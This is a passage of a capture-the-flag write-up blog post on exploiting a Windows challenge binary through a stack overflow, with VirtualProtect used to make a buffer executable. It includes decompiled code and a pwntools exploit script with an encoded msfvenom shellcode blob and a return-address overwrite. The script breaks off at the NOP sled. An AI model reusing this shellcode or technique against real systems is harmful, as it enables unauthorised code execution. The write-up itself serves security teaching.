<!doctype html><html lang=en-gb><head><meta charset=utf-8><meta http-equiv=content-type content="text/html"><meta name=viewport content="width=device-width,initial-scale=1"><title itemprop=name>Weapon Safety -- Windows Pwn | a rant of my adventures</title>
<meta property="og:title" content="Weapon Safety -- Windows Pwn | a rant of my adventures"><meta name=twitter:title content="Weapon Safety -- Windows Pwn | a rant of my adventures"><meta itemprop=name content="Weapon Safety -- Windows Pwn | a rant of my adventures"><meta name=application-name content="Weapon Safety -- Windows Pwn | a rant of my adventures"><meta property="og:site_name" content="a rant of my adventures"><meta name=description content="pwn challenge from cyber league 2023"><meta itemprop=description content="pwn challenge from cyber league 2023"><meta property="og:description" content="pwn challenge from cyber league 2023"><meta name=twitter:description content="pwn challenge from cyber league 2023"><meta property="og:locale" content="en-gb"><meta name=language content="en-gb"><link rel=alternate hreflang=en-gb href=https://blog.caprinux.com/posts/ctfs/2022/cyberleague-weapon-safety/ title=English><meta itemprop=image content="https://blog.caprinux.com/"><meta property="og:image" content="https://blog.caprinux.com/"><meta name=twitter:image content="https://blog.caprinux.com/"><meta name=twitter:image:src content="https://blog.caprinux.com/"><meta property="og:type" content="article"><meta property="og:article:published_time" content=2023-03-26T05:59:12Z><meta property="article:published_time" content=2023-03-26T05:59:12Z><script defer type=application/ld+json>{"@context":"http://schema.org","@type":"Article","headline":"Weapon Safety -- Windows Pwn","author":{"@type":"Person","name":""},"datePublished":"2023-03-26","description":"pwn challenge from cyber league 2023","wordCount":709,"mainEntityOfPage":"True","dateModified":"2023-03-26","image":{"@type":"imageObject","url":""},"publisher":{"@type":"Organization","name":"a rant of my adventures"}}</script><meta name=generator content="Hugo 0.125.4"><link rel=canonical href=https://blog.caprinux.com/posts/ctfs/2022/cyberleague-weapon-safety/><link href=/style.min.5d415e34e927589b6ad5fe83ea6f8006479d2d6c2fa7897ee14c54c5618ba634.css rel=stylesheet><link href=/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css rel=stylesheet><link rel=apple-touch-icon sizes=180x180 href=/icons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/icons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/icons/favicon-16x16.png><link rel=mask-icon href=/icons/safari-pinned-tab.svg><link rel="shortcut icon" href=/favicon.ico><link rel=manifest href=https://blog.caprinux.com/site.webmanifest><meta name=msapplication-config content="/browserconfig.xml"><meta name=msapplication-TileColor content="#2d89ef"><meta name=theme-color content="#434648"><link rel=icon type=image/svg+xml href=/icons/favicon.svg></head><body data-theme=dark class=notransition><script src=/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script><meta http-equiv=cache-control content="max-age=0"><meta http-equiv=cache-control content="no-cache"><meta http-equiv=expires content="0"><meta http-equiv=expires content="Tue, 01 Jan 1980 1:00:00 GMT"><meta http-equiv=pragma content="no-cache"><div class=navbar role=navigation><nav class=menu aria-label="Main Navigation"><a href=https://blog.caprinux.com/ class=logo><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-home"><title>Home</title><path d="M3 9l9-7 9 7v11a2 2 0 01-2 2H5a2 2 0 01-2-2z"/><polyline points="9 22 9 12 15 12 15 22"/></svg>
</a><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentcolor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7H3.40726"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M.5 12.5V1.5c0-.552285.447715-1 1-1h11C13.0523.5 13.5.947715 13.5 1.5v11C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C.947715 13.5.5 13.0523.5 12.5z"/></svg></span></label><div class=trigger><ul class=trigger-container><li><a class=menu-link href=/>Home</a></li><li><a class="menu-link active" href=/posts/>Posts</a></li><li><a class=menu-link href=/pwn/>Pwn</a></li><li><a class=menu-link href=/pages/about/>About</a></li><li class=menu-separator><span></span></li></ul><a id=mode href=#><svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg><svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg></a></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article><header class=header><h1 class=header-title>Weapon Safety -- Windows Pwn</h1><div class=post-meta><time datetime=2023-03-26T05:59:12+00:00 itemprop=datePublished>26 Mar 2023</time></div></header><details class=toc open><summary><b>Table of Contents</b></summary><nav id=TableOfContents><ul><li><ul><li><a href=#initial-analysis>Initial Analysis</a></li><li><a href=#exploit-strategy>Exploit Strategy</a></li><li><a href=#exploit-script>Exploit Script</a></li></ul></li></ul></nav></details><div class=page-content><h1 id=weapon-safety>Weapon Safety</h1><h3 id=initial-analysis>Initial Analysis</h3><p>We are provided with a 64-bit windows executable. If we throw it into IDA, we can see that it did not manage to find the <code>main</code> function.</p><p>However we have the <code>_start</code> function and we can easily find this <code>main</code> function ourselves by either looking for strings in the program and finding cross references</p><p><img src=https://i.imgur.com/S0zLGwu.png></p><p>or clicking into the start function and finding the main function (somewhere in the last block), which can be identified by the function call right after 3 arguments are being loaded (r8, rdx, ecx).</p><p><img src=https://i.imgur.com/Hq93NdL.png></p><p><img src=https://i.imgur.com/lWmv6qi.png></p><p>If we look inside the <code>main</code> function, we see that our program presents us with a menu.</p><p><img src=https://i.imgur.com/WUvSXFA.png></p><p>If we look inside option 1, we see that it calls VirtualProtect on an address of our choice.</p><p>VirtualProtect essentially allows us to change the permissions on a memory page. This will be useful to us later.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=kr>__int64</span> <span class=kr>__fastcall</span> <span class=nf>sub_140001390</span><span class=p>(</span><span class=kt>unsigned</span> <span class=kt>int</span> <span class=n>a1</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=kt>unsigned</span> <span class=kt>int</span> <span class=n>v1</span><span class=p>;</span> <span class=c1>// esi
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=k>const</span> <span class=kt>char</span> <span class=o>*</span><span class=n>v2</span><span class=p>;</span> <span class=c1>// rcx
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=n>DWORD</span> <span class=n>flOldProtect</span><span class=p>;</span> <span class=c1>// [rsp+2Ch] [rbp-14h] BYREF
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=n>LPVOID</span> <span class=n>lpAddress</span><span class=p>;</span> <span class=c1>// [rsp+30h] [rbp-10h] BYREF
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=n>SIZE_T</span> <span class=n>dwSize</span><span class=p>;</span> <span class=c1>// [rsp+38h] [rbp-8h] BYREF
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=n>DWORD</span> <span class=n>flNewProtect</span><span class=p>[</span><span class=mi>3</span><span class=p>];</span> <span class=c1>// [rsp+44h] [rbp+4h] BYREF
</span></span></span><span class=line><span class=cl><span class=c1></span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=n>a1</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=n>v1</span> <span class=o>=</span> <span class=n>a1</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=n>v2</span> <span class=o>=</span> <span class=s>&#34;Safety is already disabled!&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=k>else</span>
</span></span><span class=line><span class=cl>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Enter safety code #1: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>scanf</span><span class=p>(</span><span class=s>&#34;%lld&#34;</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>lpAddress</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Enter safety code #2: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>scanf</span><span class=p>(</span><span class=s>&#34;%lld&#34;</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>dwSize</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Enter safety code #3: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>scanf</span><span class=p>(</span><span class=s>&#34;%ld&#34;</span><span class=p>,</span> <span class=n>flNewProtect</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=n>v1</span> <span class=o>=</span> <span class=nf>VirtualProtect</span><span class=p>(</span><span class=n>lpAddress</span><span class=p>,</span> <span class=n>dwSize</span><span class=p>,</span> <span class=n>flNewProtect</span><span class=p>[</span><span class=mi>0</span><span class=p>],</span> <span class=o>&amp;</span><span class=n>flOldProtect</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=n>v1</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>      <span class=k>return</span> <span class=n>v1</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=n>v2</span> <span class=o>=</span> <span class=s>&#34;Unable to disable safety catch&#34;</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=n>v2</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>return</span> <span class=n>v1</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><p>Option 2 allows us to allocate a buffer of any size.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl>          <span class=k>case</span> <span class=mi>2</span><span class=o>:</span>
</span></span><span class=line><span class=cl>            <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Enter size of ammunition: &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nf>scanf</span><span class=p>(</span><span class=s>&#34;%lld&#34;</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>Size</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=n>Buffer</span> <span class=o>=</span> <span class=p>(</span><span class=kt>char</span> <span class=o>*</span><span class=p>)</span><span class=nf>malloc</span><span class=p>(</span><span class=n>Size</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;Ammunition loaded! Please collect it at locker #%lld</span><span class=se>\n</span><span class=s>&#34;</span><span class=p>,</span> <span class=n>Buffer</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=k>break</span><span class=p>;</span>
</span></span></code></pre></div><p>Finally, option 3 presents us with a buffer overflow vulnerability by allowing us to write <strong>Size</strong> <em>(determined by option 2)</em> amount of bytes into our <strong>Buffer</strong>.</p><p>It then copies our buffer into <strong>opt</strong> which is on our stack with a buffer size of 4. (!!! overflow !!!)</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl>          <span class=k>case</span> <span class=mi>3</span><span class=o>:</span>
</span></span><span class=line><span class=cl>            <span class=nf>fgets</span><span class=p>(</span><span class=n>Buffer</span><span class=p>,</span> <span class=n>Size</span><span class=p>,</span> <span class=n>stdin</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;Fire in the hole!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nf>strcpy</span><span class=p>(</span><span class=n>opt</span><span class=p>,</span> <span class=n>v17</span><span class=p>);</span>
</span></span></code></pre></div><h3 id=exploit-strategy>Exploit Strategy</h3><p>Since we have a BOF, we can essentially take control of our instruction pointer. But the question is, where to return to?</p><p>Note that option 1 and 2 allows us to allocate a RWX <em>(readable, writable, executable)</em> buffer of a known address.</p><p>We can basically write shellcode inside, and then jump to it via our BOF in option 3.</p><h3 id=exploit-script>Exploit Script</h3><p>Just like all other windows pwn, we have to first find our offset to return address.</p><p><img src=https://i.imgur.com/9en9oZq.png></p><p>If you double click on the <code>opt</code> variable, we can see in IDA that it is stored at <code>rbp-0x90</code>. Since the return address is at <code>rbp+0x8</code>, the offset to our return address is <strong>0x98</strong>.</p><p>We also need to find the bad bytes <em>(essentially bytes that will truncate our input)</em> for our shellcode.</p><p><a href=https://alomancy.gitbook.io/guides/guides/bof#5.-finding-bad-characters>https://alomancy.gitbook.io/guides/guides/bof#5.-finding-bad-characters</a></p><p>We can create our shellcode with msf venom <em>(refer to website below)</em></p><p><a href=https://alomancy.gitbook.io/guides/guides/bof#8.-creating-payload>https://alomancy.gitbook.io/guides/guides/bof#8.-creating-payload</a></p><p>We might need to make some space on stack for decoding</p><p><a href=https://alomancy.gitbook.io/guides/guides/bof#9.-nops>https://alomancy.gitbook.io/guides/guides/bof#9.-nops</a></p><p>Final script:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>opt</span> <span class=o>=</span> <span class=k>lambda</span> <span class=n>x</span><span class=p>:</span> <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;Select option: &#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>x</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span> <span class=o>=</span> <span class=n>process</span><span class=p>(</span><span class=s2>&#34;./weapon_safety.exe&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># allocate buffer of size 2000</span>
</span></span><span class=line><span class=cl><span class=n>opt</span><span class=p>(</span><span class=mi>2</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;2000&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;locker #&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>addr</span> <span class=o>=</span> <span class=n>p</span><span class=o>.</span><span class=n>recvlineS</span><span class=p>()</span><span class=o>.</span><span class=n>strip</span><span class=p>()</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># change buffer permissions to RWX</span>
</span></span><span class=line><span class=cl><span class=n>opt</span><span class=p>(</span><span class=mi>1</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>addr</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>b</span><span class=s1>&#39;2000&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>b</span><span class=s1>&#39;64&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># write shellcode into buffer</span>
</span></span><span class=line><span class=cl><span class=n>opt</span><span class=p>(</span><span class=mi>3</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>=</span>  <span class=sa>b</span><span class=s2>&#34;&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x05\xef\xff\xff\xff\x48\xbb\x82\x3b\xdc\x14\x5e</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xac\x63\x94\x48\x31\x58\x27\x48\x2d\xf8\xff\xff</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xff\xe2\xf4\x7e\x73\x5f\xf0\xae\x44\xa3\x94\x82</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x3b\x9d\x45\x1f\xfc\x31\xc5\xd4\x73\xed\xc6\x3b</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\xe8\xc6\xe2\x73\x57\x46\x46\xe4\xe8\xc6\xa2</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x73\x57\x66\x0e\xe4\x6c\x23\xc8\x71\x91\x25\x97</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\x52\x54\x2e\x07\xbd\x68\x5c\x80\x43\xd5\x43</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xf2\xd1\x55\x5f\x6d\x81\x79\xd0\x7a\x8d\x5c\xd5</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xfe\x43\x1f\xc0\x07\x94\x15\x8e\x27\xe3\x1c\x82</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x3b\xdc\x5c\xdb\x6c\x17\xf3\xca\x3a\x0c\x44\xd5</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\x7b\xd0\x09\x7b\xfc\x5d\x5f\x7c\x80\xc2\xca</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xc4\x15\x55\xd5\x98\xeb\xdc\x83\xed\x91\x25\x97</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\x52\x54\x2e\x7a\x1d\xdd\x53\xed\x62\x55\xba</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xdb\xa9\xe5\x12\xaf\x2f\xb0\x8a\x7e\xe5\xc5\x2b</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x74\x3b\xd0\x09\x7b\xf8\x5d\x5f\x7c\x05\xd5\x09</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x37\x94\x50\xd5\xec\x7f\xdd\x83\xeb\x9d\x9f\x5a</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x24\x2b\x95\x52\x7a\x84\x55\x06\xf2\x3a\xce\xc3</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x63\x9d\x4d\x1f\xf6\x2b\x17\x6e\x1b\x9d\x46\xa1</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x4c\x3b\xd5\xdb\x61\x94\x9f\x4c\x45\x34\x6b\x7d</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xc4\x81\x5d\xe0\xdb\x10\xa6\xdd\x08\xee\x14\x5e</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xed\x35\xdd\x0b\xdd\x94\x95\xb2\x0c\x62\x94\x82</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x72\x55\xf1\x17\x10\x61\x94\xad\x32\xce\x9f\x57</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x7a\x22\xc0\xcb\xb2\x38\x58\xd7\x5d\x22\x2e\xce</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x4c\xfa\x13\xa1\x79\x2f\x1d\x68\x53\xdd\x15\x5e</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xac\x3a\xd5\x38\x12\x5c\x7f\x5e\x53\xb6\xc4\xd2</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x76\xed\xdd\x13\x9d\xa3\xdc\x7d\xfb\x94\x9d\x9c</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\x9c\x54\xca\xb2\x1d\x55\xe4\x46\x6c\x4b\x62</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xc4\x09\x5c\xd7\x6b\x09\x84\xc3\x63\x90\x9d\xbc</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\xea\x6d\xc3\x81\x45\xb1\x2a\xcd\x9c\x41\xca</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xba\x18\x54\x5c\xac\x63\xdd\x3a\x58\xb1\x70\x5e</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xac\x63\x94\x82\x7a\x8c\x55\x0e\xe4\xea\x76\xd5</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x6c\x8b\x59\x6f\x6c\x09\x99\xdb\x7a\x8c\xf6\xa2</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xca\xa4\xd0\xa6\x6f\xdd\x15\x16\x21\x27\xb0\x9a</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xfd\xdc\x7c\x16\x25\x85\xc2\xd2\x7a\x8c\x55\x0e</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xed\x33\xdd\x7d\xfb\x9d\x44\x17\x53\xab\xd9\x0b</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xfa\x90\x9d\x9f\xed\xd9\xed\x4e\x04\x5a\xeb\x8b</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xe4\x52\x46\xca\xc4\x16\x9f\x50\xed\xd9\x9c\x05</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x26\xbc\xeb\x8b\x17\x93\x21\x20\x6d\x9d\xae\xf8</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x39\xde\x09\x7d\xee\x94\x97\x9a\x84\x5f\x92\xfe</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x31\x5c\xef\xbe\xd9\x66\x2f\xc5\x28\xae\x7b\x34</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl><span class=n>buf</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\xac\x3a\xd5\x0b\xe1\x23\xc1\x5e\xac\x63\x94</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>arch</span> <span class=o>=</span> <span class=s2>&#34;amd64&#34;</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>=</span> <span class=sa>b</span><span class=s2>&#34;A&#34;</span><span class=o>*</span><span class=mi>152</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=n>p64</span><span class=p>(</span><span class=nb>int</span><span class=p>(</span><span class=n>addr</span><span class=p>)</span><span class=o>+</span><span class=mh>0xa0</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1># nop sled</span>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>+=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x90</span><span class=s2>&#34;</span><span class=o>*</span><span class=mi>24</span>
